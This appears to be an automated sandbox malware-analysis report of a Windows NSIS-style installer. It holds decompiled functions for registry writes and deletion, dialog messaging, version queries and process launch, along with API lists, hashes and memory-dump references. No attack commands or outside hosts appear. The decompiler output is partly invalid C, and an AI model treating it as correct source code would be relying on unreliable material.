0x0040236e
0x00402374
0x00402379
0x00402379
0x0040237d
0x00402389
0x00402389
0x004023a2
0x004023a4
0x004023a4
0x004023a7
0x0040247d
0x0040247d
0x0040288e
0x0040289a

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402341
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq166.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402361
RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsq166.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040239A
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsq166.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040247D

Strings

C:\Users\user\AppData\Local\Temp\nsq166.tmp, xrefs: 00402352, 00402360, 00402374, 00402384, 0040238F

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsq166.tmp
API String ID: 1356686001-1797884168
Opcode ID: 7863a0f49a6f39dd7089a52df85a66d0e401da730b8a2c07c6ee90d0110cbeae
Instruction ID: d7b132d9018d44432a73f3315d2b91b6aa1600c7a927e9fa70905f900517fa5a
Opcode Fuzzy Hash: 7863a0f49a6f39dd7089a52df85a66d0e401da730b8a2c07c6ee90d0110cbeae
Instruction Fuzzy Hash: BA1160B1E00209BFEB10AFA0DE49EAF767CFB54398F10413AF905B61D0D7B85D019669

Uniqueness

Uniqueness Score: -1.00%

Function 73351837, Relevance: 7.7, APIs: 5, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E73351837(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v52;
				void _t45;
				void _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x7335405c = _a8;
				_t77 = 0;
				 *0x73354060 = _a16;
				_v12 = 0;
				_v8 = E7335123B();
				_t90 = E733512FE(_t42);
				_t87 = _t85;
				_t81 = E7335123B();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E7335123B();
					_t77 = E733512FE(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3c;
						if( *((char*)(_t81 + 1)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E73351429(_t85, _t90, _t87,  &_v52);
								E73351266( &_v52);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E73352EF0(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3e;
						if( *((char*)(_t81 + 1)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((char*)(_t81 + 2)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((char*)(_t81 + 2)) != 0x3e) {
							_t48 = E73352F10(_t59, _t83, _t85);
						} else {
							_t48 = E73352F40(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x7c;
						if( *((char*)(_t81 + 1)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E73352D80(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E73352E30(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((char*)(_t81 + 1)) - 0x26;
					if( *((char*)(_t81 + 1)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E73352D40(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L59;
				}
			}

0x73351837
0x73351841
0x7335184a
0x7335184d
0x73351852
0x7335185b
0x73351864
0x73351866
0x7335186d
0x7335186f
0x73351872
0x73351876
0x73351882
0x7335188b
0x73351890
0x73351893
0x73351899
0x73351899
0x7335189c
0x7335189f
0x733518a2
0x73351968
0x73351968
0x7335196b
0x733519e5
0x733519e9
0x733519f8
0x733519fb
0x73351a03
0x73351a03
0x73351a03
0x73351a05
0x73351a05
0x73351a06
0x73351a06
0x73351a08
0x73351a0a
0x73351a10
0x73351a19
0x73351a2a
0x73351a35
0x73351a35
0x733519fd
0x733519e0
0x733519e0
0x733519e2
0x733519e2
0x00000000
0x733519e2
0x733519ff
0x73351a01
0x00000000
0x00000000
0x00000000
0x73351a01
0x733519ed
0x733519f1
0x00000000
0x733519f1
0x7335196d
0x7335196d
0x7335196e
0x733519d7
0x733519d9
0x00000000
0x00000000
0x733519db
0x733519de
0x00000000
0x00000000
0x00000000
0x733519de
0x73351970
0x73351970
0x73351971
0x733519aa
0x733519ae
0x733519ca
0x733519cd
0x00000000
0x00000000
0x733519cf
0x00000000
0x00000000
0x733519d1
0x733519d3
0x00000000
0x00000000
0x00000000
0x733519d5
0x733519b0
0x733519b4
0x733519b6
0x733519b8
0x733519ba
0x733519c3
0x733519bc
0x733519bc
0x733519bc
0x00000000
0x733519ba
0x73351973
0x73351973
0x73351976
0x733519a3
0x733519a5
0x00000000
0x733519a5
0x73351978
0x73351978
0x7335197b
0x7335198b
0x7335198f
0x7335199c
0x7335199e
0x00000000
0x7335199e
0x73351991
0x73351993
0x00000000
0x00000000
0x73351995
0x73351998
0x00000000
0x00000000
0x00000000
0x7335199a
0x7335197e
0x7335197f
0x73351985
0x73351987
0x73351987
0x00000000
0x7335197f
0x733518a8
0x73351920
0x73351922
0x73351925
0x73351943
0x73351946
0x7335194c
0x73351951
0x73351927
0x73351927
0x7335192b
0x7335192f
0x73351931
0x73351931
0x73351954
0x73351957
0x00000000
0x7335195d
0x7335195d
0x73351960
0x00000000
0x73351960
0x73351957
0x733518aa
0x733518ad
0x73351911
0x73351913
0x73351915
0x00000000
0x00000000
0x00000000
0x7335191b
0x733518af
0x733518b2
0x00000000
0x00000000
0x733518b4
0x733518b5
0x733518eb
0x733518ef
0x73351907
0x73351909
0x00000000
0x73351909
0x733518f1
0x733518f3
0x00000000
0x00000000
0x733518f9
0x733518fc
0x00000000
0x00000000
0x00000000
0x73351902
0x733518b7
0x733518ba
0x733518e1
0x00000000
0x733518bc
0x733518bc
0x733518bd
0x733518d1
0x733518d3
0x733518bf
0x733518c1
0x733518c7
0x733518c9
0x733518c9
0x733518c1
0x00000000
0x733518bd

APIs

GlobalFree.KERNEL32 ref: 73351893
GlobalFree.KERNEL32 ref: 73351A2A
GlobalFree.KERNEL32 ref: 73351A2F

Memory Dump Source

Source File: 00000000.00000002.237544307.0000000073351000.00000020.00020000.sdmp, Offset: 73350000, based on PE: true

Associated: 00000000.00000002.237538806.0000000073350000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237551256.0000000073353000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237556712.0000000073355000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 2b7a530e9633f4f8fb457340d76de35139c4e06d3b804e9a8c383d90cf7a9c3c
Instruction ID: 18d41b9ee573e5ad5edd8f907def6b4a76f33779b8336055e27d134d17ba6d3b
Opcode Fuzzy Hash: 2b7a530e9633f4f8fb457340d76de35139c4e06d3b804e9a8c383d90cf7a9c3c
Instruction Fuzzy Hash: 9551B072D04198AFEF339BB4CC44FAEBABEAB44255F18015AF407E3184C73599428791

Uniqueness

Uniqueness Score: -1.00%

Function 00402A36, Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402A36(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423f50 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A36(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405E88(2);
					if(_t27 == 0) {
						if( *0x423f50 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}

0x00402a57
0x00402a5f
0x00402a87
0x00402a71
0x00402ac1
0x00402ac7
0x00000000
0x00402ac9
0x00402a85
0x00000000
0x00000000
0x00402a85
0x00402a9c
0x00402aa4
0x00402aab
0x00402ad7
0x00000000
0x00000000
0x00402adf
0x00402ae7
0x00000000
0x00000000
0x00000000
0x00402ae7
0x00000000
0x00402aba
0x00402ace

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A57
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
RegCloseKey.ADVAPI32(?), ref: 00402A9C
RegCloseKey.ADVAPI32(?), ref: 00402AC1
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 90165163457562f2d2db0d0e016cf4740f9c141c2854e05e69f214c53397e3bf
Instruction ID: 3ec7b1818cbfc33efeafaf7017db19c7c479205e5d6f4ff66fb244667a93d6f3
Opcode Fuzzy Hash: 90165163457562f2d2db0d0e016cf4740f9c141c2854e05e69f214c53397e3bf
Instruction Fuzzy Hash: 93112971A00009FFDF319F90DE49EAF7B7DEB44385B104436F905A10A0DBB59E51AE69

Uniqueness

Uniqueness Score: -1.00%

Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029F6(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401ccb
0x00401cd2
0x00401d01
0x00401d09
0x00401d10
0x00401d10
0x0040288e
0x0040289a

APIs

GetDlgItem.USER32 ref: 00401CC5
GetClientRect.USER32 ref: 00401CD2
LoadImageA.USER32 ref: 00401CF3
SendMessageA.USER32 ref: 00401D01
DeleteObject.GDI32(00000000), ref: 00401D10

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 70cca8153c69b2e132429069c22b9ddf05dbb7ba62a9a7cfa9b79a9bcebcea9b
Instruction ID: de7316f9b9f1bcc3f0c1dff9ae5dc63c91f1472c52c052d8cf8a0da7f27950be
Opcode Fuzzy Hash: 70cca8153c69b2e132429069c22b9ddf05dbb7ba62a9a7cfa9b79a9bcebcea9b
Instruction Fuzzy Hash: D5F01DB2E04105BFD700EFA4EE89DAFB7BDEB44345B104576F602F2190C6789D018B69

Uniqueness

Uniqueness Score: -1.00%

Function 004046F1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E004046F1(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405B88(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405B88(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405B88(_t34, 0, 0x4204a0, 0x4204a0, _a8);
				wsprintfA(_t26 + lstrlenA(0x4204a0), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423678, _a4, 0x4204a0);
			}

0x004046f9
0x004046fd
0x00404705
0x00404708
0x00404709
0x0040470b
0x0040470d
0x00404710
0x00404710
0x00404717
0x0040471d
0x0040471d
0x00404724
0x0040472f
0x00404730
0x00404733
0x00404733
0x00404740
0x0040474b
0x0040474e
0x00404760
0x00404767
0x00404768
0x00404777
0x00404787
0x004047a3

APIs

lstrlenA.KERNEL32(004204A0,004204A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404611,000000DF,0000040F,00000400,00000000), ref: 0040477F
wsprintfA.USER32 ref: 00404787
SetDlgItemTextA.USER32 ref: 0040479A

Strings

%u.%u%s%s, xrefs: 00404769

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 900e3a4788bbcdb5831f4eb4ea085b1ecc54347093cfae2cf180548b061950ae
Instruction ID: e1128f73888b2767c9277aed1687fd20c93e739cc52df1aac9c0a45a5a8dde9d
Opcode Fuzzy Hash: 900e3a4788bbcdb5831f4eb4ea085b1ecc54347093cfae2cf180548b061950ae
Instruction Fuzzy Hash: 7311E2736001243BDB10666D9C46EEF3699DBC6335F14423BFA25F61D1E938AC5286A8

Uniqueness

Uniqueness Score: -1.00%

Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029D9(3);
				 *(_t55 + 8) = E004029D9(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029F6(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029F6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029F6();
					_t28 = E004029F6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029D9();
					_t37 = E004029D9();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E00405AC4();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}

0x00401bb6
0x00401bc2
0x00401bc5
0x00401bce
0x00401bce
0x00401bd1
0x00401bd5
0x00401bde
0x00401bde
0x00401be1
0x00401be5
0x00401be7
0x00401c34
0x00401c36
0x00401c3f
0x00401c47
0x00401c4a
0x00401c4a
0x00401c53
0x00000000
0x00401be9
0x00401bf0
0x00401bf2
0x00401bfa
0x00401bfd
0x00401c25
0x00401c59
0x00401c59
0x00401bff
0x00401c0d
0x00401c15
0x00401c18
0x00401c18
0x00401bfd
0x00401c5c
0x00401c5f
0x00401c65
0x00402833
0x00402833
0x0040288e
0x0040289a

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
SendMessageA.USER32 ref: 00401C25

Strings

!, xrefs: 00401BE1

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 4c88f05d798f5705ce1e1e18451d2fcf653d7f56610e9d44bad61831beeb824c
Instruction ID: 67abd366a37910a3fb0c7fe19d632a25016d3899897cc5a5bd850e91adcb6683
Opcode Fuzzy Hash: 4c88f05d798f5705ce1e1e18451d2fcf653d7f56610e9d44bad61831beeb824c
Instruction Fuzzy Hash: B721C4B1A44209BFEF01AFB4CE4AAAE7B75EF44344F14053EF602B60D1D6B84980E718

Uniqueness

Uniqueness Score: -1.00%

Function 004053C6, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004053C6(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a8,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x004053cf
0x004053eb
0x004053f3
0x004053f8
0x00000000
0x004053fe
0x00405402

APIs

CreateProcessA.KERNEL32 ref: 004053EB
CloseHandle.KERNEL32(?), ref: 004053F8

Strings

Error launching installer, xrefs: 004053D9
C:\Users\user\AppData\Local\Temp\, xrefs: 004053C6

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateHandleProcess
String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
API String ID: 3712363035-7751565
Opcode ID: 3b814a6f076d0ba9038e170a1e0f3647fdefee354992cb10a65e7e77ca0a2381
Instruction ID: 069b69ca15cd8b990da55ccc95fe3be7356009797bdfa18ab8f6d6c8c96e71ef
Opcode Fuzzy Hash: 3b814a6f076d0ba9038e170a1e0f3647fdefee354992cb10a65e7e77ca0a2381
Instruction Fuzzy Hash: A3E0ECB4A00219BFDB00AF64ED49AAB7BBDEB00305F90C522A911E2150D775D8118AB9

Uniqueness

Uniqueness Score: -1.00%

Function 00405659, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405659(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}

0x0040565a
0x00405671
0x00405679
0x00405679
0x00405681

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403226,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 0040565F
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403226,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405668
lstrcatA.KERNEL32(?,00409010), ref: 00405679

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405659

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
Instruction ID: d5422d5486d5b384c4dcc02911800b35c31fcf4388d9dde419d5dff5703c7688
Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
Instruction Fuzzy Hash: 8BD05272605A202ED2022A258C05E9B7A28CF06311B044866B540B2292C6386D818AEE

Uniqueness

Uniqueness Score: -1.00%

Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029F6(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x409010, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E00405AC4(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E00405AC4(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x00401ec7
0x00401ecf
0x00401ed4
0x00401ed9
0x00401edd
0x00401ee0
0x00401ee2
0x00401ee9
0x00401ef2
0x00401efa
0x00401efd
0x00401f12
0x00401f18
0x00401f2b
0x00401f34
0x00401f40
0x00401f45
0x00401f45
0x00401f2b
0x00401f48
0x00401b75
0x00401b75
0x00401efd
0x0040288e
0x0040289a

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
